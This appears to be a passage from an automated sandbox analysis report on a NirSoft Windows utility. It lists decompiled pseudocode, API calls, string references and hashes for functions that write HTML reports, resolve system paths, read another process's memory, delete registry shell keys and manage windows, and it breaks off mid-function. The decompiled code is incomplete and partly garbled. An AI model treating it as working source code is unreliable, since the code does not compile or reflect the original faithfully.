                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                        • String ID: caption
                                                                                                        • API String ID: 973020956-4135340389
                                                                                                        • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                        • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                                                        • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                        • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004081E4, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 65%
                                                                                                        			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040B550(0x1800, __ecx);
				_t57 = _t49;
				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x40fe30; // 0x0
				if(_t62 != 0) {
					_push(0x40fe30);
					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040B1EC();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x40fe28; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040B1EC();
				_t43 = E00407343(_t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00407D03(_t57, _t64, _a4);
				}
				return _t43;
			}

















                                                                                                        0x004081e4
                                                                                                        0x004081ec
                                                                                                        0x004081fc
                                                                                                        0x00408200
                                                                                                        0x00408215
                                                                                                        0x0040821c
                                                                                                        0x0040822a
                                                                                                        0x00408231
                                                                                                        0x0040823f
                                                                                                        0x00408246
                                                                                                        0x0040824b
                                                                                                        0x0040824e
                                                                                                        0x0040825a
                                                                                                        0x0040825c
                                                                                                        0x00408261
                                                                                                        0x0040826c
                                                                                                        0x0040826d
                                                                                                        0x0040826e
                                                                                                        0x00408273
                                                                                                        0x00408273
                                                                                                        0x00408276
                                                                                                        0x0040827c
                                                                                                        0x0040828a
                                                                                                        0x00408290
                                                                                                        0x004082ab
                                                                                                        0x004082c5
                                                                                                        0x004082c6
                                                                                                        0x004082d1
                                                                                                        0x004082d2
                                                                                                        0x004082d3
                                                                                                        0x004082e7
                                                                                                        0x004082ec
                                                                                                        0x004082f0
                                                                                                        0x00000000
                                                                                                        0x004082f5
                                                                                                        0x004082fe

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
                                                                                                        • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
                                                                                                        • <table dir="rtl"><tr><td>, xrefs: 00408284
                                                                                                        • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memset$_snwprintf$wcscpy
                                                                                                        • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                        • API String ID: 1283228442-2366825230
                                                                                                        • Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                        • Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
                                                                                                        • Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                        • Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040920A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 85%
                                                                                                        			E0040920A(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040488D(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E00404C08( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E00404C08( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}








                                                                                                        0x0040920a
                                                                                                        0x00409218
                                                                                                        0x00409223
                                                                                                        0x0040922c
                                                                                                        0x0040924b
                                                                                                        0x00409253
                                                                                                        0x0040929b
                                                                                                        0x004092e4
                                                                                                        0x0040929d
                                                                                                        0x004092a3
                                                                                                        0x004092b1
                                                                                                        0x004092bd
                                                                                                        0x004092cc
                                                                                                        0x004092d1
                                                                                                        0x004092d8
                                                                                                        0x004092dd
                                                                                                        0x00409255
                                                                                                        0x0040925b
                                                                                                        0x00409269
                                                                                                        0x00409275
                                                                                                        0x00409282
                                                                                                        0x0040928d
                                                                                                        0x00409292
                                                                                                        0x004092ec
                                                                                                        0x004092ef
                                                                                                        0x004092ef
                                                                                                        0x00409231
                                                                                                        0x00409232
                                                                                                        0x00409233
                                                                                                        0x00000000
                                                                                                        0x00409239
                                                                                                        0x0040921a
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • wcschr.MSVCRT ref: 00409223
                                                                                                        • wcscpy.MSVCRT ref: 00409233
                                                                                                          • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                                                          • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                                                          • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                                                        • wcscpy.MSVCRT ref: 00409282
                                                                                                        • wcscat.MSVCRT ref: 0040928D
                                                                                                        • memset.MSVCRT ref: 00409269
                                                                                                          • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                                                          • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                                                        • memset.MSVCRT ref: 004092B1
                                                                                                        • memcpy.MSVCRT ref: 004092CC
                                                                                                        • wcscat.MSVCRT ref: 004092D8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                        • String ID: \systemroot
                                                                                                        • API String ID: 4173585201-1821301763
                                                                                                        • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                        • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
                                                                                                        • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                        • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00409C70, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 63librarystringloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 48%
                                                                                                        			E00409C70(signed int* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char* _v16;
				int _v18;
				signed int _v20;
				char _v36;
				intOrPtr* _t21;
				struct HINSTANCE__* _t22;
				signed int _t23;
				signed int _t24;
				_Unknown_base(*)()* _t26;
				char* _t28;
				int _t31;

				_t21 = _a4;
				if( *_t21 == 0) {
					_t22 = GetModuleHandleW(L"kernel32.dll");
					_v8 = _t22;
					_t23 = GetProcAddress(_t22, "GetProcAddress");
					 *_a4 = _t23;
					_t24 = _t23 ^ _v8;
					if((_t24 & 0xfff00000) != 0) {
						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
						_v20 = _v20 & 0x00000000;
						_v12 = _t26;
						asm("stosd");
						asm("stosw");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsw");
						_t28 =  &_v36;
						asm("movsb");
						_v16 = _t28;
						_v20 = strlen(_t28);
						_t31 = strlen( &_v36);
						_v18 = _t31;
						_t24 = _v12(_v8,  &_v20, 0, _a4);
					}
					return _t24;
				}
				return _t21;
			}
















                                                                                                        0x00409c73
                                                                                                        0x00409c7c
                                                                                                        0x00409c90
                                                                                                        0x00409c9f
                                                                                                        0x00409ca2
                                                                                                        0x00409ca7
                                                                                                        0x00409ca9
                                                                                                        0x00409cb1
                                                                                                        0x00409cc0
                                                                                                        0x00409cc2
                                                                                                        0x00409cc7
                                                                                                        0x00409ccf
                                                                                                        0x00409cd0
                                                                                                        0x00409cd7
                                                                                                        0x00409cd8
                                                                                                        0x00409cd9
                                                                                                        0x00409cda
                                                                                                        0x00409cdc
                                                                                                        0x00409ce0
                                                                                                        0x00409ce1
                                                                                                        0x00409ce9
                                                                                                        0x00409cf1
                                                                                                        0x00409cfb
                                                                                                        0x00409d08
                                                                                                        0x00409d08
                                                                                                        0x00000000
                                                                                                        0x00409d0d
                                                                                                        0x00409d0f

                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                        • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                        • strlen.MSVCRT ref: 00409CE4
                                                                                                        • strlen.MSVCRT ref: 00409CF1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProcstrlen
                                                                                                        • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                                                        • API String ID: 1027343248-2054640941
                                                                                                        • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                        • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                                                        • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                        • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401AC9, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 79%
                                                                                                        			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
				long _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				char _v28;
				void _v538;
				char _v540;
				int _v548;
				char _v564;
				char _v22292;
				void* __edi;
				void* __esi;
				void* _t37;
				void* _t48;
				void* _t56;
				signed int _t57;
				void* _t67;
				long _t69;
				void* _t70;
				void* _t72;
				void* _t74;
				void* _t76;

				_t67 = __edx;
				E0040B550(0x5714, __ecx);
				_t37 = OpenProcess(0x10, 0, _a16);
				_t82 = _t37;
				_a16 = _t37;
				if(_t37 == 0) {
					_t69 = GetLastError();
				} else {
					_t72 =  &_v22292;
					E0040171F(_t72, _t82);
					_v8 = 0;
					if(ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8) == 0) {
						_t69 = GetLastError();
					} else {
						_t48 = E00405642( &_v564);
						_t74 = _v548;
						_t70 = _t48;
						_a12 = _t74;
						_v540 = 0;
						memset( &_v538, 0, 0x1fe);
						asm("cdq");
						_push(_t67);
						_push(_t74);
						_push(_t70);
						_push(L"%d  %I64x");
						_push(0xff);
						_push( &_v540);
						L0040B1EC();
						_v548 = 0;
						E004055D1( &_v540,  &_v564);
						_t16 = _t70 + 0xa; // 0xa
						_t68 = _t16;
						_v24 = 0;
						_v12 = 0;
						_v20 = 0;
						_v16 = 0x100;
						_v28 = 0;
						E0040559A( &_v28, _t16);
						_t76 = _v12;
						_t56 = 0x40c4e8;
						if(_t76 != 0) {
							_t56 = _t76;
						}
						_t26 = _t70 + 2; // 0x2
						_t66 = _t70 + _t26;
						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8);
						_t85 = _t76;
						if(_t76 == 0) {
							_t76 = 0x40c4e8;
						}
						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
						_t69 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292);
						E004055D1(_t61,  &_v28);
					}
					E004055D1(CloseHandle(_a16),  &_v564);
				}
				return _t69;
			}


























                                                                                                        0x00401ac9
                                                                                                        0x00401ad1
                                                                                                        0x00401ae1
                                                                                                        0x00401ae7
                                                                                                        0x00401ae9
                                                                                                        0x00401aec
                                                                                                        0x00401c1b
                                                                                                        0x00401af2
                                                                                                        0x00401af2
                                                                                                        0x00401af8
                                                                                                        0x00401b0c
                                                                                                        0x00401b1a
                                                                                                        0x00401bfd
                                                                                                        0x00401b20
                                                                                                        0x00401b26
                                                                                                        0x00401b2b
                                                                                                        0x00401b36
                                                                                                        0x00401b40
                                                                                                        0x00401b43
                                                                                                        0x00401b4a
                                                                                                        0x00401b54
                                                                                                        0x00401b55
                                                                                                        0x00401b56
                                                                                                        0x00401b57
                                                                                                        0x00401b58
                                                                                                        0x00401b63
                                                                                                        0x00401b68
                                                                                                        0x00401b69
                                                                                                        0x00401b77
                                                                                                        0x00401b7d
                                                                                                        0x00401b82
                                                                                                        0x00401b82
                                                                                                        0x00401b88
                                                                                                        0x00401b8b
                                                                                                        0x00401b8e
                                                                                                        0x00401b91
                                                                                                        0x00401b98
                                                                                                        0x00401b9b
                                                                                                        0x00401ba0
                                                                                                        0x00401ba5
                                                                                                        0x00401baa
                                                                                                        0x00401bac
                                                                                                        0x00401bac
                                                                                                        0x00401bb2
                                                                                                        0x00401bb2
                                                                                                        0x00401bbe
                                                                                                        0x00401bc4
                                                                                                        0x00401bc6
                                                                                                        0x00401bc8
                                                                                                        0x00401bc8
                                                                                                        0x00401bd7
                                                                                                        0x00401bee
                                                                                                        0x00401bf0
                                                                                                        0x00401bf0
                                                                                                        0x00401c0e
                                                                                                        0x00401c0e
                                                                                                        0x00401c23

                                                                                                        APIs
                                                                                                        • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                                                        • ReadProcessMemory.KERNEL32(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                                                        • memset.MSVCRT ref: 00401B4A
                                                                                                        • ReadProcessMemory.KERNEL32(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                                                        • _snwprintf.MSVCRT ref: 00401B69
                                                                                                          • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                          • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                        • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                                                        • CloseHandle.KERNEL32(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                                                        • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Process$ErrorLastMemoryReadfree$CloseHandleOpen_snwprintfmemset
                                                                                                        • String ID: %d %I64x
                                                                                                        • API String ID: 2567117392-2565891505
                                                                                                        • Opcode ID: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                                        • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                                                        • Opcode Fuzzy Hash: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                                        • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004045BA, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 39%
                                                                                                        			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
				void* _v8;
				void _v2054;
				short _v2056;
				void _v4102;
				short _v4104;
				signed int _t28;
				void* _t34;

				E0040B550(0x1004, __ecx);
				_t36 = 0;
				if(E004043F8( &_v8, 0x2001f) == 0) {
					_v2056 = 0;
					memset( &_v2054, 0, 0x7fe);
					_v4104 = 0;
					memset( &_v4102, 0, 0x7fe);
					_t34 = __ebx + 0x20a;
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s\\command");
					_push(0x3ff);
					_push( &_v2056);
					L0040B1EC();
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v4104);
					L0040B1EC();
					RegDeleteKeyW(_v8,  &_v2056);
					_t28 = RegDeleteKeyW(_v8,  &_v4104);
					asm("sbb esi, esi");
					_t36 =  ~_t28 + 1;
					RegCloseKey(_v8);
				}
				return _t36;
			}










                                                                                                        0x004045c2
                                                                                                        0x004045d1
                                                                                                        0x004045da
                                                                                                        0x004045ef
                                                                                                        0x004045f6
                                                                                                        0x00404604
                                                                                                        0x0040460b
                                                                                                        0x00404610
                                                                                                        0x00404616
                                                                                                        0x00404617
                                                                                                        0x00404618
                                                                                                        0x00404628
                                                                                                        0x00404629
                                                                                                        0x0040462a
                                                                                                        0x0040462f
                                                                                                        0x00404630
                                                                                                        0x00404631
                                                                                                        0x0040463c
                                                                                                        0x0040463d
                                                                                                        0x0040463e
                                                                                                        0x00404656
                                                                                                        0x00404662
                                                                                                        0x0040466b
                                                                                                        0x0040466d
                                                                                                        0x0040466e
                                                                                                        0x00404674
                                                                                                        0x00404679

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Delete_snwprintfmemset$Close
                                                                                                        • String ID: %s\shell\%s$%s\shell\%s\command
                                                                                                        • API String ID: 1018939227-3575174989
                                                                                                        • Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                        • Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
                                                                                                        • Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                        • Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040313D, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 58%
                                                                                                        			E0040313D(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}










                                                                                                        0x0040314a
                                                                                                        0x00403151
                                                                                                        0x00403158
                                                                                                        0x0040315a
                                                                                                        0x00403162
                                                                                                        0x00403166
                                                                                                        0x00403190
                                                                                                        0x00403190
                                                                                                        0x00403198
                                                                                                        0x00403199
                                                                                                        0x0040319e
                                                                                                        0x004031bb
                                                                                                        0x004031a0
                                                                                                        0x004031ad
                                                                                                        0x004031b6
                                                                                                        0x004031b6
                                                                                                        0x0040319e
                                                                                                        0x0040316e
                                                                                                        0x00403176
                                                                                                        0x0040317c
                                                                                                        0x0040317f
                                                                                                        0x0040317f
                                                                                                        0x00403182
                                                                                                        0x0040318a
                                                                                                        0x00000000
                                                                                                        0x0040318c
                                                                                                        0x0040318c
                                                                                                        0x00000000
                                                                                                        0x0040318c

                                                                                                        APIs
                                                                                                        • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                        • #17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
                                                                                                        • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Library$AddressFreeLoadMessageProc
                                                                                                        • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                        • API String ID: 2780580303-317687271
                                                                                                        • Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                        • Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
                                                                                                        • Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                        • Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00404DA9, Relevance: 15.1, APIs: 10, Instructions: 111COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 85%
                                                                                                        			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
